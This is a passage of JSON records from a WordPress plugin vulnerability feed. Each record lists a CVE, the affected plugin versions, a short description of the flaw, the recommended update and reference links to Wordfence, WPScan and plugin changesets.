version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/bplugins_sdk\\\/inc\\\/Base\\\/FSActivate.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/bplugins_sdk\\\/inc\\\/Base\\\/FSActivate.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac245316-228e-4508-b3fe-f7071fb1bc8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac245316-228e-4508-b3fe-f7071fb1bc8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8676","slug":"b-slider","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Sensitive Information Exposure in versions less than, or equal to, 2.0.0 via the get_active_plugins function. This makes it possible for authenticated attackers, with subscriber-level access and above to extract sensitive data including installed plugin information.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/adminMenu.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.30\\\/adminMenu.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343487%40b-slider&new=3343487%40b-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c19b24ef-cf49-4a5c-a187-0f09ac53c337?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c19b24ef-cf49-4a5c-a187-0f09ac53c337?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2104","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"2.0.0","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to unauthorized post publication due to insufficient validation on the pagelayer_save_content() function in all versions up to, and including, 1.9.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to bypass post moderation and publish posts to the site.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253356%40pagelayer&new=3253356%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253356%40pagelayer&new=3253356%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e3897fb-0f40-4111-8a7d-60415e1f9f96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e3897fb-0f40-4111-8a7d-60415e1f9f96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5331","slug":"breakdance","versionImpact":"1.7.1","versionEndExcluding":"2.0.0","description":"The Breakdance plugin for WordPress is vulnerable to unauthorized access of data in all versions up to, and including, 1.7.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to export form submissions.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe8d453-21f0-43e2-84d3-3c520ab9c308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe8d453-21f0-43e2-84d3-3c520ab9c308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5330","slug":"breakdance","versionImpact":"1.7.2","versionEndExcluding":"2.0.0","description":"The Breakdance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the breakdance_css_file_paths_cache parameter in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbd26f5-b75e-41a3-aefb-d6c8cc2cec7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbd26f5-b75e-41a3-aefb-d6c8cc2cec7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-2-0-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13546","slug":"generateblocks","versionImpact":"1.9.1","versionEndExcluding":"2.0.0","description":"The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.1 via the 'get_image_description' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of private, draft, and scheduled posts and pages.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1047\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1047\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-dynamic-content.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239461\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239461\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f6f2a8c-ecd9-482c-a32e-0c3d7a7e4ec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f6f2a8c-ecd9-482c-a32e-0c3d7a7e4ec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13732","slug":"responsive-block-editor-addons","versionImpact":"1.9.9","versionEndExcluding":"2.0.0","description":"The Responsive Blocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018section_tag\u2019 parameter in all versions up to, and including, 1.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-block-editor-addons\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L643\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-block-editor-addons\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L643\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231017\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231017\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-block-editor-addons\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-block-editor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0e5c85-72c3-4f09-aade-ec5a82b9cc41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0e5c85-72c3-4f09-aade-ec5a82b9cc41?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13519","slug":"marketking-multivendor-marketplace-for-woocommerce","versionImpact":"1.9.80","versionEndExcluding":"2.0.0","description":"The MarketKing \u2014 Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin's settings in all versions up to, and including, 1.9.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180752%40marketking-multivendor-marketplace-for-woocommerce&new=3180752%40marketking-multivendor-marketplace-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180752%40marketking-multivendor-marketplace-for-woocommerce&new=3180752%40marketking-multivendor-marketplace-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5061e0be-1785-476a-9528-d6f95656bd61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5061e0be-1785-476a-9528-d6f95656bd61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12559","slug":"clickdesigns","versionImpact":"1.8.0","versionEndExcluding":"2.0.0","description":"The ClickDesigns plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clickdesigns_add_api' and the 'clickdesigns_remove_api' functions in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to modify or remove the plugin's API key.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1d19968-dbd8-4433-99a7-b973a59c4653?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1d19968-dbd8-4433-99a7-b973a59c4653?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4560","slug":"chatbot-chatgpt","versionImpact":"1.9.9","versionEndExcluding":"2.0.0","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the chatbot_chatgpt_upload_file_to_assistant function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers, with to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bc33a05-d462-492e-9ea5-cf37b887cc94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bc33a05-d462-492e-9ea5-cf37b887cc94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-file-upload.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-file-upload.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2601","slug":"wpbrutalai","versionEndExcluding":"2.0.0","description":"The wpbrutalai WordPress plugin before 2.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57769468-3802-4985-bf5e-44ec1d59f5fd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57769468-3802-4985-bf5e-44ec1d59f5fd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5163","slug":"weather-atlas","versionImpact":"1.2.1","versionEndExcluding":"2.0.0","description":"The Weather Atlas Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shortcode-weather-atlas' shortcode in versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2324caa-f804-4f76-9d08-8951fbee4669?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2324caa-f804-4f76-9d08-8951fbee4669?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L858\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L858\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L844\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L844\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L860\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L860\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12521","slug":"slotti-ajanvaraus","versionImpact":"1.3.1","versionEndExcluding":"2.0.0","description":"The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti-embed-ga' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218204%40slotti-ajanvaraus&new=3218204%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218204%40slotti-ajanvaraus&new=3218204%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d95ec4b-0cbc-49c6-821e-7050d8045159?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d95ec4b-0cbc-49c6-821e-7050d8045159?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13383","slug":"hd-quiz","versionImpact":"1.8.14","versionEndExcluding":"2.0.0","description":"The HD Quiz WordPress plugin before 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85bc905d-c960-4399-a879-2d18a4b03007\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85bc905d-c960-4399-a879-2d18a4b03007\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8418","slug":"b-slider","versionImpact":"1.1.30","versionEndExcluding":"2.0.0","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Arbitrary Plugin Installation in all versions up to, and including, 1.1.30. This is due to missing capability checks on the activated_plugin function. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins on the server which can make remote code execution possible.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.28\\\/adminMenu.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.28\\\/adminMenu.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342079\\\/b-slider\\\/trunk\\\/adminMenu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342079\\\/b-slider\\\/trunk\\\/adminMenu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deffd646-5117-4086-bf4b-8a17ffdaad8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deffd646-5117-4086-bf4b-8a17ffdaad8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10013","slug":"kau-boys-backend-localization","versionImpact":"1.6.1","versionEndExcluding":"2.0","description":"A vulnerability was found in Kau-Boy Backend Localization Plugin up to 1.6.1 on WordPress. It has been rated as problematic. This issue affects some unknown processing of the file backend_localization.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.0 is able to address this issue. The name of the patch is 43dc96defd7944da12ff116476a6890acd7dd24b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-227231.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227231\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227231\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/43dc96defd7944da12ff116476a6890acd7dd24b\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/43dc96defd7944da12ff116476a6890acd7dd24b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10151","slug":"auto-iframe","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The Auto iFrame WordPress plugin before 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/487facf7-8880-48b3-b1b2-0d09823d3c46\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/487facf7-8880-48b3-b1b2-0d09823d3c46\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3276","slug":"skt-blocks","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The SKT Blocks \u2013 Gutenberg based Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Carousel block in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267889%40skt-blocks&new=3267889%40skt-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267889%40skt-blocks&new=3267889%40skt-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9345eaa-c8c0-4830-a9af-48305a2f80fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9345eaa-c8c0-4830-a9af-48305a2f80fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10857","slug":"product-input-fields-for-woocommerce","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.9 via the handle_downloads() function due to insufficient file path validation\/sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195423\\\/product-input-fields-for-woocommerce\\\/trunk?contextall=1&old=3173573&old_path=%2Fproduct-input-fields-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195423\\\/product-input-fields-for-woocommerce\\\/trunk?contextall=1&old=3173573&old_path=%2Fproduct-input-fields-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13752","slug":"wedevs-project-manager","versionImpact":"2","versionEndExcluding":"2","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check in the '\/pm\/v2\/settings\/notice' endpoint all versions up to, and including, 2.6.17. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cause a persistent denial of service condition.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_0.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_0.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_3.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_3.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftags%2F2.6.17%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftags%2F2.6.18%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&new=3240807&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftags%2F2.6.17%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftags%2F2.6.18%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&new=3240807&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&new=3240806&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&new=3240806&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd54a50b-13ce-43ce-bce1-8fe132abc07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd54a50b-13ce-43ce-bce1-8fe132abc07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
